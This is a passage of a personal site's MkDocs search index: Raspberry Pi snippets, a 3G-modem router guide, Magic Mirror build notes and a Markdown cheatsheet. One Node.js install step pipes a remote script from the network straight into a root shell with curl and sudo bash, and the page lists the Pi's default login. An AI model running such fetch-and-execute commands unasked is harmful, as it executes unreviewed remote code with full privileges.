", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#contributors", "title": "Contributors", "text": "Thanks to Boris Berman for the script rewrite from function to classes
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/snippets/", "title": "Snippets", "text": "", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#enable-ssh-on-raspberry-pi-without-a-screen", "title": "Enable SSH on Raspberry Pi Without a Screen", "text": "Put the micro SD card into your computer You'll have to locate the boot directory at your SD card
for example:
cd /Volumes/boot\n
All you have to do is create an empty file called ssh.
touch ssh\n
That's it. Insert the SD card to the Pi. You should have enabled SSH at boot.
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#default-user-and-password-after-installation", "title": "Default User and Password After Installation", "text": "User: pi\nPassword: raspberry\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#basic-configuration", "title": "Basic Configuration", "text": "sudo raspi-config\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#update-os", "title": "Update OS", "text": "sudo apt-get update && sudo apt-get upgrade -y\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#disable-ipv6-on-raspberry-pi-os", "title": "Disable IPv6 on Raspberry Pi Os", "text": "Edit \u201c/etc/sysctl.conf\u201d:
sudo nano /etc/sysctl.conf\n
Add this to the end:
net.ipv6.conf.all.disable_ipv6=1\nnet.ipv6.conf.default.disable_ipv6=1\nnet.ipv6.conf.lo.disable_ipv6=1\nnet.ipv6.conf.eth0.disable_ipv6 = 1\n
Save and close the file. Edit \u201c/etc/rc.local\u201d:
sudo nano /etc/rc.local\n
Add this to the end (but before \u201cexit 0\u201d):
systemctl restart procps\n
Save and close the file. Reboot
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#show-raspberry-temperature", "title": "Show Raspberry Temperature", "text": "/opt/vc/bin/vcgencmd measure_temp\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#samba-for-raspberrypi", "title": "Samba for RaspberryPi", "text": "sudo apt-get update\nsudo apt-get install -y samba samba-common-bin smbclient cifs-utils\nsudo smbpasswd -a pi ( my-pi-samba-remote-password )\nsudo nano /etc/samba/smb.conf\n
change:
workgroup = YOUR WINDOWS WORKGROUP NAME\n
add at end:
[share]\npath = /home/pi/Desktop/share\n available = yes\n valid users = pi\n read only = no\n browsable = yes\n public = yes\n writable = yes\n
the shared path must exist: ( if you work via desktop ( HDMI or VNC ) it is very convenient just to read or drop from/to this shared dir ) mkdir /home/pi/Desktop/share
sudo reboot\n
Start samba Server
sudo /usr/sbin/service smbd start\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/guides/3g-modem-host/", "title": "3g Modem Host Configuration", "text": "Install ubuntu server for raspberrypi using Raspberry Pi Imager{}
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#packages-installation", "title": "Packages Installation", "text": "apt install -y ppp curl wget git dnsutils whois net-tools htop gcc libusb-1.0-0-dev iptables-persistent isc-dhcp-server\n
After the install add a symlink
ln -s /usr/include/libusb-1.0/libusb.h /usr/include/libusb.h\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#sakis3g-script-installation", "title": "sakis3g Script Installation", "text": "Clone, Compile, and copy to /usr/bin/
git clone https://github.com/Trixarian/sakis3g-source.git\ncd sakis3g-source\n./compile\ncp build/sakis3gz /usr/bin/sakis3g\n
Create new script for auto connect
nano /usr/bin/sakis3gConnect.sh\n
Note
interactive connect (for testing) bash sakis3g --interactive
Copy the following
#!/bin/bash\n\n/usr/bin/sakis3g start USBINTERFACE=\"5\" APN=\"vob3g\" APN_USER=\" \" APN_PASS=\" \"\n
Note
When APN credentials are empty, APN_USER and APN_PASS should be a string with a space
Add executable permissions
chmod +x sakis3gConnect.sh\n
Run the script sakis3gConnect.sh
You should have a new interface ppp0
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#configuring-dhcp-server", "title": "Configuring DHCP Server", "text": "!! info The following configuration assumes use of eth0 interface for the DHCP
Edit
nano /etc/default/isc-dhcp-server\n
Add the following to the end of the config
INTERFACESv4=\"eth0\"\nINTERFACESv6=\"eth0\"\n
Edit
nano /etc/dhcp/dhcpd.conf\n
Change the following options to (you can choose the name servers you use):
option domain-name \"local\";\noption domain-name-servers 8.8.8.8;\ndefault-lease-time 600;\nmax-lease-time 7200;\nddns-update-style none;\nauthoritative;\n
Append the DHCP Network config to the end of the file (Change for your need):
subnet 192.168.20.0 netmask 255.255.255.0 {\nrange 192.168.20.5 192.168.20.30;\noption routers 192.168.20.1;\noption domain-name-servers 8.8.8.8, 8.8.4.4;\n}\n
Save & Exit
run
echo 1 > /proc/sys/net/ipv4/ip_forward\n
Edit
nano /etc/sysctl.conf\n
Change the following option
net.ipv4.ip_forward=1\n
Restart and Test
service isc-dhcp-server restart\nservice isc-dhcp-server status\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#configure-static-ip-for-the-th0-interface-dhcp", "title": "Configure static ip for the th0 Interface & DHCP", "text": "edit:
/etc/netplan/50-cloud-init.yaml\n
network:\n ethernets:\n eth0:\n addresses: [192.168.20.1/24]\ngateway4: 192.168.20.1\n nameservers:\n addresses: [1.1.1.1, 8.8.8.8]\nversion: 2\n
After the reboot you should connect to the new static IP
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#lets-route-all-the-trafic-to-new-interface-with-iptables", "title": "Lets route all the trafic to new interface with Iptables", "text": "iptables -F\niptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE\niptables --append FORWARD --in-interface eth0 -j ACCEPT\n
Save the rules
iptables-save > /etc/iptables/rules.v4\nip6tables-save > /etc/iptables/rules.v6\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#cron-examples", "title": "Cron examples", "text": "@reboot sleep 20 && /usr/bin/sakis3gConnect.sh\n*/5 * * * * /usr/bin/sakis3gConnect.sh\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/", "title": "Magic Mirror 2.0", "text": "To be honest, it's not my first time building a Magic Mirror project. My first magicmirror can be found here. The Magic Mirror 2.0 is based on Raspberry Pi 4 with Docker Container.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#references", "title": "References", "text": "magicmirror.builders official website. khassel's magicmirror docker image documentation website.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#the-build-process", "title": "The Build Process", "text": "I had dead iMac 2011 27\" with 2k display. I've managed to use it's LCD panel with this product from AliExpress. It actually a full controller for the specific LCD panel, including the inverter for backlight. Basically, it's a full-fledged LCD Monitor with HDMI we need for the Raspberry Pi 4.
I've decided to test the controller for the LCD Panel inside the original iMac's body.
I've connected raspberry to the new monitor for the magicmirror testing and configuration.
Since my previous experience with my first magicmirror build, I've decided to add a Motion Sensor to the Raspberry Pi to detect the movement of the person in front of the mirror and turn the display on/off accordingly. The second thing I've added is a Power Button to turn the Raspberry Pi on, off and restart it without physical access to the Raspberry Pi.
I couldn't find any open source projects for the functionality I needed of the power button and the Motion Sensor. So I've decided to create my own solution. Below are the scripts that I've created:
External Power Button Wake/Power Off/Restart Motion Sensor Display Control Thats how i've tested the functionality of the power button and the motion sensor.
I've ordered a reflective glass with 4 holes for mounting. It was a challenge to find a suitable reflective glass for the MagicMirror. The product I've found is not perfect - the glass is tinted, but it's a good enough solution and way better than the Glass Mirror Films I've used on my first Magic Mirror Project.
After I've done all the proof of concepts
that everything will work as I intended, I've continued to build the frame to house all the components.
I've used scrap wood I had laying around to build the frame and the mounting for the LCD panel, and the glass
For mounting the Magic Mirror to the wall i've used the smallest TV Mount I've found.
After the frame is built, I've added the electronics to the frame.
Performing a sanity check on the electronics and display assembly.
Since I went with the floating
effect, the glass isn't covering all of the frame; all the exposed parts of the glass need to be covered to avoid light leaking.
And the final Magic Mirror on the wall.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#the-software", "title": "The Software", "text": "The magicmiror is based on MagicMirror project. running on docker on Raspberry OS.
Below the docker compose file for your reference.
version: '3'\n\nservices:\n magicmirror:\n image: karsten13/magicmirror\n container_name: magicmirror\n hostname: magicmirror\n restart: always\n ports:\n - 80:8080\n volumes:\n - ./config:/opt/magic_mirror/config\n - ./modules:/opt/magic_mirror/modules\n - ./css:/opt/magic_mirror/css\n - /tmp/.X11-unix:/tmp/.X11-unix\n - /opt/vc:/opt/vc/:ro\n - /sys:/sys\n - /usr/bin/vcgencmd:/usr/bin/vcgencmd\n - /etc/localtime:/etc/localtime\n devices:\n - /dev/vchiq\n environment:\n - LD_LIBRARY_PATH=/opt/vc/lib\n - DISPLAY=unix:0.0\n - TZ=Asia/Jerusalem\n - SET_CONTAINER_TIMEZONE=true\n - CONTAINER_TIMEZONE=Asia/Jerusalem\n shm_size: '1024mb'\n command:\n - npm\n - run\n - start\n
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror/", "title": "Magic Mirror", "text": "", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#magic-mirror-build-pictures", "title": "Magic Mirror Build Pictures", "text": "23\" Samsung screen power resoldering:
Wooden frame initial fitting test on a glass with dual mirror film applied:
Testing the screen installation (frame removed) with power cords:
Testing black&white picture from a laptop after frame assembly:
Power, Lan, Usb external ports cutouts:
Fitted extended ports with wood filler:
Extended ports:
Assembly With screen, Raspberry Pi, cable routing, black material which do not pass light where there is no screen:
Adding some color for the frame:
Testing everything is working as it should be:
Full assembly behind the mirror:
Final Product:
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#configuration-setup", "title": "Configuration Setup", "text": "", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#change-display-rotation", "title": "Change Display Rotation", "text": "sudo nano /boot/config.txt\n
Add one of those according to your setup to the config file:
Code Description display_rotate=0 Normal display_rotate=1 90 degrees display_rotate=2 180 degrees display_rotate=3 270 degrees display_rotate=0x8000 horizontal flip display_rotate=0x20000 vertical flip NOTE: You can rotate both the image and touch interface 180\u00ba by entering lcd_rotate=2 instead
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disabling-the-screensaver", "title": "Disabling the Screensaver", "text": "Change to OPEN GL Driver
sudo nano /boot/config.txt\n
add this:
dtoverlay=vc4-fkms-v3d\n
(Please note, you will need the x11-xserver-utils package installed.)
edit ~/.config/lxsession/LXDE-pi/autostart:
sudo nano ~/.config/lxsession/LXDE-pi/autostart\n
Add the following lines:
@xset s noblank\n@xset s off\n@xset -dpms\n
Edit /etc/lightdm/lightdm.conf:
sudo nano /etc/lightdm/lightdm.conf\n
Add the following line below [SeatDefaults]
xserver-command=X -s 0 -dpms\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#os-ui-finishes", "title": "OS UI Finishes", "text": "Make the Background Black:
Right click the Desktop
-> Desktop Preferences
and Change: Layout -> no image
Colour -> #000000
Hit ok.
Right click on the top panel
-> Panel Preferences
-> Appearance
Select Solid Color (With Opacity)
make sure Opacity at 0
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disable-wifi-power-save", "title": "Disable WiFi Power Save", "text": "Edit /etc/modprobe.d/8192cu.conf
sudo nano /etc/modprobe.d/8192cu.conf\n
Add the following lines
# Disable power saving\noptions 8192cu rtw_power_mgnt=0 rtw_enusbss=1 rtw_ips_mode=1\n
For Raspberry Pi 3 Edit /etc/network/interfaces
sudo nano /etc/network/interfaces\n
Add the following line under the wlan0 section
allow-hotplug wlan0\niface wlan0 inet manual\nwpa-conf /etc/wpa_supplicant/wpa_supplicant.conf\nwireless-power off\n
Reboot your PI
sudo reboot\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disable-cursor-on-startup", "title": "Disable Cursor on Startup", "text": "sudo apt-get install unclutter\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#installation", "title": "Installation", "text": "first install node.js and npm
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -\nsudo apt-get install -y nodejs\n
and then run:
sudo npm install -g npm@latest\n
If you need to remove node and npm run this:
sudo apt-get remove nodejs nodejs-legacy nodered\n
Installation:
magicmirror-installation
say no to PM2 auto start - it will be installed manually
To Start from SSH:
cd ~/MagicMirror && DISPLAY=:0 npm start\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#pm2-auto-start-installation", "title": "pm2 auto start installation", "text": "sudo npm install -g pm2\ncd ~\nnano mm.sh\n
add this to mm.sh and save:
#!/bin/sh\n\ncd ~/MagicMirror\nDISPLAY=:0 npm start\n
chmod +x mm.sh\npm2 start mm.sh\npm2 save\npm2 startup\n
pm2 commands:
pm2 restart mm\npm2 stop mm\npm2 start mm\npm2 log\npm2 show mm\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#logrotate-installation", "title": "Logrotate Installation", "text": "This will Retain for 14 days compress the logs.
pm2 install pm2-logrotate\npm2 set pm2-logrotate:compress true\npm2 set pm2-logrotate:retain 14\npm2 set pm2-logrotate:max_size 10M\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "utilities/htpasswd-generator/", "title": "htpasswd Password Generator", "text": "This htpasswd password encryption applet is written in JavaScript, so the entire process runs within your browser.Nothing is transmitted to any server, we take your privacy and securityserious.
", "tags": ["htpasswd"]}, {"location": "utilities/htpasswd-generator/#credit-sources", "title": "Credit & Sources", "text": "The code was built by macminiosx and cloned from his repository. It was slightly modified to fit this website.
", "tags": ["htpasswd"]}, {"location": "utilities/useful-links-tools/", "title": "Useful Links & Tools", "text": "Services Description Mail-Tester.com Tests the quality of emails ipleak.net Shows Information About Your IP sslLabs.com Test Your SSL Certification ifconfig.io curl ifconfig.io DSL Reports.com Speedtest For QoS Best Configuration Hurricane Electric Free DNS Hosting Free DNS & DDNS Service freedns.afraid.org Free DNS & DDNS Service", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/", "title": "Wifi QR Image Generator", "text": "", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#description", "title": "Description", "text": "This will generate a QR code what can be used with any iOS/Android device to access a given Wifi without manually adding a network and password. Just scan the QR Code and you are connected. This is a fully static code - no data is send to any server!
", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#generator", "title": "Generator", "text": "", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#credit-sources", "title": "Credit & Sources", "text": "This code was taken from this site qistoph Github Page. It was fully reviewed for any malicious code or functionality and slightly modified to fit this site
", "tags": ["utilities"]}, {"location": "utilities/browsers-extensions/chrome/", "title": "Chrome Extensions", "text": "List of extensions for Chrome browser.
Chrome Extensions Description 1Password Password Manager (Desktop App Required) Clear Browsing Data Clear Browsing Data HTTPS Everywhere Automatically use HTTPS Pushbullet Connectivity App uBlock Origin Ad Block EditThisCookie Edit cookie per page Wappalyzer Uncovers the technologies used on websites IP Address and Domain Information Find detailed information about each IP address JSON viewer Pretty print / display JSON content in the browser", "tags": ["chrome", "extensions"]}, {"location": "utilities/browsers-extensions/firefox/", "title": "Firefox Extensions", "text": "List of extensions for Firefox browser.
Firefox Extensions Description FoxyProxy Proxy Management Wappalyzer Identifies software on websites Clear Browsing Data Delete browsing data 1Password Password Manager", "tags": ["firefox", "extensions"]}, {"location": "utilities/markdown-cheatsheet/about/", "title": "About Markdown", "text": "Markdown is a lightweight markup language with plain text formatting syntax. It is designed so that it can be converted to HTML and many other formats using a tool by the same name. Markdown is often used to format readme files, for writing messages in online discussion forums, and to create rich text using a plain text editor. As the initial description of Markdown contained ambiguities and unanswered questions, many implementations and extensions of Markdown appeared over the years to answer these issues.
This Page is fully written with Markdown Language and converted to HTML
", "tags": ["markdown-cheatsheet", "mkdocs"]}, {"location": "utilities/markdown-cheatsheet/about/#material-for-mkdocs-markdown", "title": "Material for MkDocs Markdown", "text": "This website is built with MkDocs. MkDocs is a static site generator that can be used to generate websites with a clean and simple user interface. It is a free and open source project.
Warning
Most of the advanced features used to generate this website and the Markdown syntax used from Material Theme for MkDocs and may not apply to other websites.
", "tags": ["markdown-cheatsheet", "mkdocs"]}, {"location": "utilities/markdown-cheatsheet/admonition/", "title": "Markdown Admonitions", "text": "Admonitions, also known as call-outs, are an excellent choice for including side content without significantly interrupting the document flow. Material for MkDocs provides several different types of admonitions and allows for the inclusion and nesting of arbitrary content.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#usage", "title": "Usage", "text": "Admonitions follow a simple syntax: a block starts with !!!
, followed by a single keyword used as a [type qualifier]. The content of the block follows on the next line, indented by four spaces:
Admonition!!! note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#changing-the-title", "title": "Changing The Title", "text": "By default, the title will equal the type qualifier in titlecase. However, it can be changed by adding a quoted string containing valid Markdown (including links, formatting, ...) after the type qualifier:
Admonition with custom title!!! note \"Phasellus posuere in sem ut cursus\"\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Phasellus posuere in sem ut cursus
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#removing-the-title", "title": "Removing The Title", "text": "Similar to [changing the title], the icon and title can be omitted entirely by adding an empty string directly after the type qualifier. Note that this will not work for [collapsible blocks]:
Admonition without title!!! note \"\"\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#collapsible-blocks", "title": "Collapsible Blocks", "text": "When [Details] is enabled and an admonition block is started with ???
instead of !!!
, the admonition is rendered as a collapsible block with a small toggle on the right side:
Admonition, collapsible??? note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Adding a +
after the ???
token renders the block expanded:
Admonition, collapsible and initially expanded???+ note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#supported-types", "title": "Supported Types", "text": "Following is a list of type qualifiers provided by Material for MkDocs, whereas the default type, and thus fallback for unknown type qualifiers, is note
:
note
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
abstract
, summary
, tldr
Abstract
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
info
, todo
Info
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
tip
, hint
, important
Tip
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
success
, check
, done
Success
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
question
, help
, faq
Question
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
warning
, caution
, attention
Warning
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
failure
, fail
, missing
Failure
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
danger
, error
Danger
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
bug
Bug
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
example
Example
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
quote
, cite
Quote
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/", "title": "Mkdocs Awesome Pages Plugin", "text": "An MkDocs plugin that simplifies configuring page titles and their order
The awesome-pages plugin allows you to customize how your pages show up in the navigation of your MkDocs without having to configure the full structure in your mkdocs.yml. It gives you detailed control using a small configuration file directly placed in the relevant directory of your documentation. MkDocs Awesome Pages Plugin Github Repository
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#features", "title": "Features", "text": "", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#customize-navigation", "title": "Customize Navigation", "text": "Create a file named .pages
in a directory and use the nav
attribute to customize the navigation on that level. List the files and subdirectories in the order that they should appear in the navigation.
nav:\n- subdirectory\n- page1.md\n- page2.md\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#rest", "title": "Rest", "text": "Pages or sections that are not mentioned in the list will not appear in the navigation. However, you may include a ...
entry to specify where all remaining items should be inserted.
nav:\n- introduction.md\n- ...\n- summary.md\n
Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only the Markdown files starting with introduction-
.
nav:\n- ... | introduction-*.md\n- ...\n- summary.md\n
Note: The pattern is checked against the basename (folder- / filename) of remaining items - not their whole path.
For more details refer to the Rest Filter Patterns section below.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#titles", "title": "Titles", "text": "You can optionally specify a title for the navigation entry.
nav:\n- ...\n- First page: page1.md\n
Note: Specifying a title for a directory containing a .pages
file that defines a title
has no effect.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#links", "title": "Links", "text": "You can also use the nav
attribute to add additional links to the navigation.
nav:\n- ...\n- Link Title: https://lukasgeiter.com\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#sections", "title": "Sections", "text": "You can group items by creating new sections.
nav:\n- introduction.md\n- Section 1:\n- page1.md\n- page2.md\n- Section 2:\n- ...\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#change-sort-order", "title": "Change Sort Order", "text": "Create a file named .pages
in a directory and set the order
attribute to asc
or desc
to change the order of navigation items.
order: desc\n
Note: Unlike the default order, this does not distinguish between files and directories. Therefore pages and sections might get mixed.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#natural-sort-type", "title": "Natural Sort Type", "text": "Create a file named .pages
in a directory and set the sort_type
attribute to natural
to use natural sort order.
This can be combined with order
above.
sort_type: natural\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#order-navigation-by-preference", "title": "Order Navigation By Preference", "text": "Create a file named .pages
in a directory and set the order_by
attribute to filename
or title
to change the order of navigation items.
order_by: title\n
This can be combined with order
and/or sort_type
above. If order
is not set it will order ascending. If no preference is set, it will order by filename.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#collapse-single-nested-pages", "title": "Collapse Single Nested Pages", "text": "Note: This feature is disabled by default. More on how to use it below
If you have directories that only contain a single page, awesome-pages can \"collapse\" them, so the folder doesn't show up in the navigation.
For example if you have the following file structure:
docs/\n\u251c\u2500 section1/\n\u2502 \u251c\u2500 img/\n\u2502 \u2502 \u251c\u2500 image1.png\n\u2502 \u2502 \u2514\u2500 image2.png\n\u2502 \u2514\u2500 index.md # Section 1\n\u2514\u2500 section2/\n\u2514\u2500 index.md # Section 2\n
The pages will appear in your navigation at the root level:
Instead of how MkDocs would display them by default:
Section 1 Index Section 2 Index ", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-all-pages", "title": "For all pages", "text": "Collapsing can be enabled globally using the collapse_single_pages
option in mkdocs.yml
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-a-sub-section", "title": "For a sub-section", "text": "If you only want to collapse certain pages, create a file called .pages
in the directory and set collapse_single_pages
to true
:
collapse_single_pages: true\n
You may also enable collapsing globally using the plugin option and then use the .pages
file to prevent certain sub-sections from being collapsed by setting collapse_single_pages
to false
.
Note: This feature works recursively. That means it will also collapse multiple levels of single pages.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-a-single-page", "title": "For a single page", "text": "If you want to enable or disable collapsing of a single page, without applying the setting recursively, create a file called .pages
in the directory and set collapse
to true
or false
:
collapse: true\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#hide-directory", "title": "Hide Directory", "text": "Create a file named .pages
in a directory and set the hide
attribute to true
to hide the directory, including all sub-pages and sub-sections, from the navigation:
hide: true\n
Note: This option only hides the section from the navigation. It will still be included in the build and can be accessed under its URL.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#set-directory-title", "title": "Set Directory Title", "text": "Create a file named .pages
in a directory and set the title
to override the title of that directory in the navigation:
title: Page Title\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#arrange-pages", "title": "Arrange Pages", "text": "Deprecated: arrange
will be removed in the next major release - Use nav
instead.
Create a file named .pages
in a directory and set the arrange
attribute to change the order of how child pages appear in the navigation. This works for actual pages as well as subdirectories.
title: Page Title\narrange:\n- page1.md\n- page2.md\n- subdirectory\n
If you only specify some pages, they will be positioned at the beginning, followed by the other pages in their original order.
You may also include a ...
entry at some position to specify where the rest of the pages should be inserted:
arrange:\n- introduction.md\n- ...\n- summary.md\n
In this example introduction.md
is positioned at the beginning, summary.md
at the end, and any other pages in between.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#combine-custom-navigation-file-structure", "title": "Combine Custom Navigation & File Structure", "text": "MkDocs gives you two ways to define the structure of your navigation. Either create a custom navigation manually in mkdocs.yml
or use the file structure to generate the navigation. This feature makes it possible to combine both methods. Allowing you to manually define parts of your navigation without having to list all files.
Note: You can freely combine this with all the other features of this plugin. However they will only affect the part of the navigation that is not defined manually.
Use the nav
entry in mkdocs.yml
to define the custom part of your navigation. Include a ...
entry where you want the navigation tree of all remaining pages to be inserted.
The following examples are based on this file structure:
docs/\n\u251c\u2500 introduction.md\n\u251c\u2500 page1.md\n\u251c\u2500 page2.md\n\u2514\u2500 folder/\n\u251c\u2500 introduction.md\n\u251c\u2500 page3.md\n\u2514\u2500 page4.md\n
If you wanted introduction.md
, page1.md
and page2.md
to appear under their own section you could do this:
nav:\n- Start:\n- page1.md\n- page2.md\n- summary.md\n- ...\n
Which would result in the following navigation:
Start Introduction Page 1 Page 2 Folder Introduction Page 3 Page 4 The ...
entry can also be placed at a deeper level:
nav:\n- page1.md\n- Rest:\n- ...\n
Which would result in the following navigation:
